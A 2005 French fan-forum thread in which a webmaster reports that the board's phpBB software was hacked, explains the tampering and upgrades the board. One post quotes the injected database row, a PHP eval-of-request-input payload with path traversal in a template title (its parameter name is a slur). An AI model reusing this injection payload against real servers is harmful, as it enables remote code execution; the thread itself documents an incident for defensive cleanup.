Abysse SataKore SegaKore Dream-Storming Guardiana SEGA GALAXY BOARD Index du Forum
 FAQFAQ   RechercherRechercher   Liste des MembresListe des Membres   Groupes d'utilisateursGroupes d'utilisateurs   DiscordChat sur Discord   S'enregistrerS'enregistrer 
 ProfilProfil   Se connecter pour vérifier ses messages privésSe connecter pour vérifier ses messages privés   ConnexionConnexion 

La board s'est faite hackée cette nuit...

 
Poster un nouveau sujet   Répondre au sujet    SEGA GALAXY BOARD Index du Forum -> La Communauté SEGA
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
iGREKKESS
Webmaster


Inscrit le: 04 Jan 2003
Messages: 7848
Localisation: Etampes

MessagePosté le: Ven Mar 18, 2005 8:21 am    Sujet du message: La board s'est faite hackée cette nuit... Répondre en citant

Je viens de me rendre compte de ça avant d'aller au boulot en me prenant un message d'erreur :
Code:
phpBB : Critical Error

Could not get theme data for themes_id [18]


J'ai donc vu ce qui merdait et rétabli le bon ordre...

A première vue, il n'y a rien eu de modifié dans la base de données à l'execption de la table des templates, mais si vous voyez des trucs anormaux, signalez-les ici, je verrai ça en revenant (et j'expliquerai en même temps ce qu'ils ont fait)...
_________________
Die Hard SEGA Fan ~1951-2001~, yippee-ki-yay ! - iGREKKESS' Blog (グレッケッス★アドベンチャー)
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur Compte Twitter
mariaud



Inscrit le: 25 Oct 2004
Messages: 1325

MessagePosté le: Ven Mar 18, 2005 11:30 am    Sujet du message: Répondre en citant

toujours aussi sécurisé phpbb :-/
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur
Madroms
Administrateur


Inscrit le: 12 Déc 2004
Messages: 1869

MessagePosté le: Ven Mar 18, 2005 12:11 pm    Sujet du message: Répondre en citant

Ben, sans se connecter, il y a maintenant le fond blanc au lieu du fond bleu foncé étoilé.
C'est tou ce que j'ai remarqué.
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur Compte Twitter
Yeo Wren



Inscrit le: 25 Jan 2005
Messages: 632
Localisation: Ça dépend de l'heure.

MessagePosté le: Ven Mar 18, 2005 12:36 pm    Sujet du message: Répondre en citant

Oui, hors connection nous avons le droit au thème silver et dès qu'on se connecte on revient au SGB.

Est-ce que c'est forcément quelqu'un qui a fait ça ou est-ce que cela peut être l'oeuvre d'un ver ?
_________________
Ytterbium Entity Optimized for Worldwide Repair and Efficient Nullification


Dernière édition par Yeo Wren le Ven Mar 18, 2005 7:11 pm; édité 2 fois
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé
iGREKKESS
Webmaster


Inscrit le: 04 Jan 2003
Messages: 7848
Localisation: Etampes

MessagePosté le: Ven Mar 18, 2005 3:07 pm    Sujet du message: Répondre en citant

Je pense en effet que cela peut être l'oeuvre d'un ver...

En fait il a réussi à accéder à la table définissant les templates installés (par une faille dans le code du côté admin), où il a supprimé les 2 entrées (pour subSilver et SpacePilot) et où il a recréé subSilver (qui n'avait du coup plus le même n° d'entrée dans la base) et un autre template intitulé FI Black avec des paramètres douteux, dont une commande dans le titre du template...

Cela donnait cela :
Code:
(2, 'aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp', 'FI Black', 'fiblack.css', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'row1', 'row2', '', '', '', '', 0, 0, 0, '', '006699', 'ffa34f', 'cc', 'bb', 'a', 0, 0);


Comme SpacePilot (18ème entrée dans la base) n'existait plus, le forum ne pouvait plus le charger et indiquait le message d'erreur donné dans le topic.
J'ai donc recréé les entrées dans la table et viré le 2 autres créées par le hacker/ver. Et je suis quasiment certain que si j'avais sélectionné le template "FI Black" dans l'administration (ce template existe pour de vrai, mais je ne l'ai jamais installé), la commande aurait été exécutée et aurait fait quelque chose de pas génial Confus


Enfin bref, je finis de remettre tout en état et je procède à une mise à jour de la board (il faut s'attendre à une coupure, le temps d'uploader, mettre à jour et sauvegarder la base...)


Edit :
Bon je suis fixé, c'est un "exploit" (qui permet d'injecter du code) pour les versions inférieures ou égales à la version 2.0.12 de phpBB (on était en 2.0.11 au moment où c'est arrivé), dont le code source complet en CPP est trouvable sans problème (sur un site de sécurité en plus Mort ou Déconcertant ), donc ça a pu être exécuté par n'importe quel con qui voulait faire joujou...

Je comptais d'ailleur virer la version du forum qui apparaît en bas pour réduire la tentation des pirates...


Mariaud : c'est le même problème que pour Windows, ce n'est pas que phpBB a le plus de failles, c'est juste qu'il est le plus répandu, donc le plus sujet aux tentatives de hack... Surpris
_________________
Die Hard SEGA Fan ~1951-2001~, yippee-ki-yay ! - iGREKKESS' Blog (グレッケッス★アドベンチャー)
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur Compte Twitter
Man-Jimaru
Administrateur


Inscrit le: 11 Déc 2004
Messages: 1363
Localisation: Nice

MessagePosté le: Ven Mar 18, 2005 3:38 pm    Sujet du message: Répondre en citant

moi je dis triple ban pour notre YS national qui a trouvé tout ça Sourire Mort de rire
_________________
Man-Jimaru
https://www.sega-legacy.fr
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur Compte Twitter
Bomber



Inscrit le: 12 Jan 2005
Messages: 159

MessagePosté le: Ven Mar 18, 2005 5:25 pm    Sujet du message: Répondre en citant

Ben il est le plus répandu, mais il a AUSSI plus de failles.
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé
iGREKKESS
Webmaster


Inscrit le: 04 Jan 2003
Messages: 7848
Localisation: Etampes

MessagePosté le: Ven Mar 18, 2005 5:39 pm    Sujet du message: Répondre en citant

Ne sois pas aussi affirmatif quand t'as aucun moyen de vérifier tes dires veux-tu Roulement des yeux
(pour savoir si phpBB a plus de failles, il faudrait faire un comparatif à niveau égal avec les autres boards...)


Bon sinon je viens de terminer l'update du forum en 2.0.13, suivi d'une sauvegarde de la DB. Ca tombe super bien, l'équipe de phpBB a justement retiré la version du forum en pied de page, donc rien de plus à faire...
_________________
Die Hard SEGA Fan ~1951-2001~, yippee-ki-yay ! - iGREKKESS' Blog (グレッケッス★アドベンチャー)
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur Compte Twitter
haliway



Inscrit le: 17 Jan 2005
Messages: 46

MessagePosté le: Dim Mar 20, 2005 10:25 pm    Sujet du message: Répondre en citant

ah le php et ses super logiciels remplis de failles
_________________
Le Dieu Saturn en personne
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé
Seb



Inscrit le: 08 Juin 2004
Messages: 852

MessagePosté le: Lun Avr 18, 2005 8:52 am    Sujet du message: Répondre en citant

Citation:
Erreur Générale

Could not obtain common word list

DEBUG MODE

SQL Error : 1104 The SELECT would examine too many records and probably take a very long time. Check your WHERE and use SET OPTION SQL_BIG_SELECTS=1 if the SELECT is ok

SELECT word_id FROM phpbb_search_wordmatch GROUP BY word_id HAVING COUNT(word_id) > 4062

Line : 309
File : functions_search.php

_________________

Attentifs, ensemble.
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé
iGREKKESS
Webmaster


Inscrit le: 04 Jan 2003
Messages: 7848
Localisation: Etampes

MessagePosté le: Lun Avr 18, 2005 10:26 pm    Sujet du message: Répondre en citant

Problème que j'avais signalé ICI et en fait c'est pas dû au forum mais à l'host qui limite certaines requêtes pour pas surcharger le serveur...

Pour éviter cette erreur, faut juste éviter de poster avec un unique URL comme contenu.
_________________
Die Hard SEGA Fan ~1951-2001~, yippee-ki-yay ! - iGREKKESS' Blog (グレッケッス★アドベンチャー)
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur Compte Twitter
Seb



Inscrit le: 08 Juin 2004
Messages: 852

MessagePosté le: Lun Avr 18, 2005 11:25 pm    Sujet du message: Répondre en citant

autant pour moi meme Clin d'oeil
_________________

Attentifs, ensemble.
Revenir en haut
Voir le profil de l'utilisateur Envoyer un message privé
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    SEGA GALAXY BOARD Index du Forum -> La Communauté SEGA Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  
Vous ne pouvez pas poster de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum


Space Pilot 3K template by Jakob Persson.
Powered by phpBB © 2001 phpBB Group
Traduction par : phpBB-fr.com